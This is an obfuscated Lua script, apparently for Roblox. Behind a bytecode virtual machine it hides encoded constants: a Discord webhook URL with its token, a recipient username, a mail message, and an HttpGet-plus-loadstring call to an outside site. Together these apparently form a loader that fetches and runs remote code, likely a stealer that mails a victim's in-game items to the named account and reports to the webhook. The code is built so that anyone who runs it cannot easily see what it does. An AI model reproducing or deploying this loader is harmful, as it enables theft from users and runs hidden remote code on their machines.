--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v98=v5(v70,v19);v19=nil;return v98;else return v70;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-((1328 -396) -(857 + 74)))) + (569 -(367 + 201)))) ;return v72-(v72%(928 -(214 + 713))) ;end end else local v73=0 + 0 ;local v74;while true do if (v73==(0 + 0)) then v74=2^(v32-(878 -(282 + 595))) ;return (((v31%(v74 + v74))>=v74) and (1638 -(1523 + 114))) or ((1065 -(68 + 997)) + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * ((3721385 -(802 + 150)) + (35153276 -22096493))) + (v40 * (65886 -(87 + 263))) + (v39 * (436 -(67 + 113))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (961 -(892 + 65)) ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1,(453 -(145 + 293)) + 5 ) * (((1429 -(44 + 386)) -(915 + 82))^32)) + v42 ;local v46=v20(v43,59 -(1524 -(998 + 488)) ,7 + 12 + 12 );local v47=((v20(v43,(34 + 7) -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or ((773 -(201 + 571)) -(1138 -(116 + 1022))) ;if (v46==((0 -0) + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 + 0 ;v44=791 -(368 + 423) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -((36 -26) + 8))) and (v47 * ((3 -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/((1 + 1)^(91 -39)))) ;end local function v25(v48) local v49;if  not v48 then local v75=0;while true do if (v75==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=3) then else v58=nil;while true do local v81=1637 -(195 + 1442) ;while true do if (v81~=(0 -0)) then else if (v52==1) then local v105=0 + 0 ;while true do if ((1 + 0)~=v105) then else for v114=397 -(115 + 281) ,v57 do local v115=0 -0 ;local v116;local v117;local v118;while true do if ((0 + 0)==v115) then local v129=0;while true do if (0==v129) then v116=0;v117=nil;v129=2 -1 ;end if (v129~=1) then else v115=3 -2 ;break;end end end if (v115==1) then v118=nil;while true do if (v116~=(868 -(550 + 317))) then else if (v117==(1 -0)) then v118=v21()~=(0 -0) ;elseif (v117==(5 -3)) then v118=v24();elseif (v117==(288 -(134 + 151))) then v118=v25();end v58[v114]=v118;break;end if (v116==(1665 -(970 + 695))) then v117=v21();v118=nil;v116=1 -0 ;end end break;end end end v56[3]=v21();v105=2;end if (v105==(1990 -(582 + 1408))) then v57=v23();v58={};v105=3 -2 ;end if (2==v105) then v52=2;break;end end end if ((2 -0)~=v52) then else for v107=3 -2 ,v23() do local v108=0;local v109;local v110;while true do if (v108==(1824 -(1195 + 629))) then v109=0 -0 ;v110=nil;v108=242 -(187 + 54) ;end if (1==v108) then while true do if (v109~=(780 -(162 + 618))) then else v110=v21();if (v20(v110,1 + 0 ,1)~=0) then else local v156=0;local v157;local v158;local v159;local v160;while true do if (2==v156) then while true do if (v157~=(2 + 0)) then else local v202=0 -0 ;local v203;local v204;while true do if (1==v202) then while true do if (v203~=(0 -0)) then else v204=0;while true do if (v204~=0) then else local v213=0 + 0 ;local v214;while true do if (v213~=0) then else v214=1636 -(1373 + 263) ;while true do if (v214~=0) then else if (v20(v159,1,1)==1) then v160[1002 -(451 + 549) ]=v58[v160[2]];end if (v20(v159,2,2)~=(1 + 0)) then else v160[3]=v58[v160[3]];end v214=1 -0 ;end if (1==v214) then v204=1;break;end end break;end end end if (v204~=(1 -0)) then else v157=3;break;end end break;end end break;end if (v202~=0) then else v203=1384 -(746 + 638) ;v204=nil;v202=1;end end end if ((2 + 1)~=v157) then else if (v20(v159,4 -1 ,3)==(342 -(218 + 123))) then v160[4]=v58[v160[4]];end v53[v107]=v160;break;end if (v157==(1582 -(1535 + 46))) then local v206=0;local v207;while true do if (0~=v206) then else v207=0;while true do if (0==v207) then local v212=0;while true do if (v212==(1 + 0)) then v207=1 + 0 ;break;end if (v212~=(560 -(306 + 254))) then else local v215=0 + 0 ;while true do if (v215==(0 -0)) then v160={v22(),v22(),nil,nil};if (v158==(0 -0)) then local v216=0;local v217;while true do if ((603 -(268 + 335))==v216) then v217=290 -(60 + 230) ;while true do if (v217~=0) then else v160[3]=v22();v160[576 -(426 + 146) ]=v22();break;end end break;end end elseif (v158==(1 + 0)) then v160[3]=v23();elseif (v158==(1458 -(282 + 1174))) then v160[814 -(569 + 242) ]=v23() -((5 -3)^(1 + 15)) ;elseif (v158==3) then local v226=1024 -(706 + 318) ;local v227;local v228;while true do if ((1251 -(721 + 530))==v226) then v227=1271 -(945 + 326) ;v228=nil;v226=2 -1 ;end if ((1 + 0)~=v226) then else while true do if (v227~=(700 -(271 + 429))) then else v228=0 + 0 ;while true do if (0~=v228) then else v160[3]=v23() -(2^(1516 -(1408 + 92))) ;v160[1090 -(461 + 625) ]=v22();break;end end break;end end break;end end end v215=1289 -(993 + 295) ;end if (v215==(1 + 0)) then v212=1172 -(418 + 753) ;break;end end end end end if (v207==(1 + 0)) then v157=1 + 1 ;break;end end break;end end end if (v157~=(0 + 0)) then else local v208=0;local v209;while true do if (v208==0) then v209=0;while true do if (v209~=1) then else v157=1;break;end if ((0 + 0)~=v209) then else v158=v20(v110,531 -(406 + 123) ,1772 -(1749 + 20) );v159=v20(v110,1 + 3 ,6);v209=1;end end break;end end end end break;end if (v156~=(1322 -(1249 + 73))) then else local v200=0 + 0 ;while true do if (v200==(1145 -(466 + 679))) then v157=0 -0 ;v158=nil;v200=1;end if (v200==(2 -1)) then v156=1901 -(106 + 1794) ;break;end end end if (v156~=1) then else local v201=0 + 0 ;while true do if (v201==(1 + 0)) then v156=5 -3 ;break;end if (v201==0) then v159=nil;v160=nil;v201=2 -1 ;end end end end end break;end end break;end end end for v111=115 -(4 + 110) ,v23() do v54[v111-1 ]=v28();end return v56;end v81=1;end if (v81==(585 -(57 + 527))) then if (v52==0) then local v106=1427 -(41 + 1386) ;while true do if (v106==1) then v55={};v56={v53,v54,nil,v55};v106=2 + 0 ;end if ((3 -1)==v106) then v52=2 -1 ;break;end if (v106==0) then v53={};v54={};v106=1;end end end break;end end end break;end if ((168 -(122 + 44))==v51) then local v76=0 -0 ;while true do if (v76~=(3 -2)) then else v51=3 + 0 ;break;end if (v76==(0 + 0)) then v56=nil;v57=nil;v76=1;end end end if (v51~=(1 -0)) then else local v77=0;while true do if (v77==1) then v51=2;break;end if (v77~=0) then else v54=nil;v55=nil;v77=1;end end end if (v51==0) then v52=65 -(30 + 35) ;v53=nil;v51=1 + 0 ;end end end local function v29(v59,v60,v61) local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...) local v82=v63;local v83=v64;local v84=v65;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=5) then if (v95<=2) then if (v95<=0) then v92[v94[2]]=v61[v94[3]];elseif (v95==1) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else v92[v94[2]]();end elseif (v95<=3) then v92[v94[2]]=v94[3];elseif (v95>4) then local v130=0;local v131;while true do if (v130==0) then v131=v94[2];v92[v131]=v92[v131](v13(v92,v131 + 1 ,v87));break;end end else local v132=0;local v133;local v134;local v135;local v136;local v137;while true do if (v132==5) then v133=0;for v197=v137,v87 do v133=v133 + 1 ;v92[v197]=v134[v133];end v86=v86 + 1 ;v94=v82[v86];v137=v94[2];v132=6;end if (v132==0) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v61[v94[3]]=v92[v94[2]];v132=1;end if (v132==3) then v92[v137 + 1 ]=v136;v92[v137]=v136[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v132=4;end if (2==v132) then v92[v94[2]]=v61[v94[3]];v86=v86 + 1 ;v94=v82[v86];v137=v94[2];v136=v92[v94[3]];v132=3;end if (4==v132) then v86=v86 + 1 ;v94=v82[v86];v137=v94[2];v134,v135=v85(v92[v137](v13(v92,v137 + 1 ,v94[3])));v87=(v135 + v137) -1 ;v132=5;end if (v132==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v61[v94[3]];v86=v86 + 1 ;v94=v82[v86];v132=2;end if (v132==7) then v94=v82[v86];v86=v94[3];break;end if (v132==6) then v92[v137]=v92[v137](v13(v92,v137 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v132=7;end end end elseif (v95<=8) then if (v95<=6) then local v123=0;local v124;local v125;local v126;local v127;while true do if (v123==1) then v87=(v126 + v124) -1 ;v127=0;v123=2;end if (v123==2) then for v162=v124,v87 do v127=v127 + 1 ;v92[v162]=v125[v127];end break;end if (v123==0) then v124=v94[2];v125,v126=v85(v92[v124](v13(v92,v124 + 1 ,v94[3])));v123=1;end end elseif (v95==7) then local v138=0;local v139;local v140;while true do if (v138==1) then v92[v139 + 1 ]=v140;v92[v139]=v140[v94[4]];break;end if (v138==0) then v139=v94[2];v140=v92[v94[3]];v138=1;end end else v86=v94[3];end elseif (v95<=9) then local v128=0;while true do if (v128==1) then v86=v86 + 1 ;v94=v82[v86];v61[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v128=2;end if (v128==3) then v86=v94[3];break;end if (v128==2) then v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v128=3;end if (v128==0) then v61[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v128=1;end end elseif (v95>10) then do return;end else v61[v94[3]]=v92[v94[2]];end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O342O332O3139322O31363035362O31342F6C756961634A6848734E78697A315755454930526F574C4E74524B6F4B6F4D3934542D775A774E546145504C5052423962394D6E7641494A3547326B64394E516E577278030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O746403083O00557365726E616D65030C3O006D65636869616D6F66696C69030B3O004D61696C4D652O7361676503113O00657A2065676F72696B757361206265737400163O0012033O00013O0026013O000D000100020004083O000D0001001203000100043O001204000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026013O0001000100010004083O000100010012030001000A3O001209000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O000B3O00017O00",v9(),...);
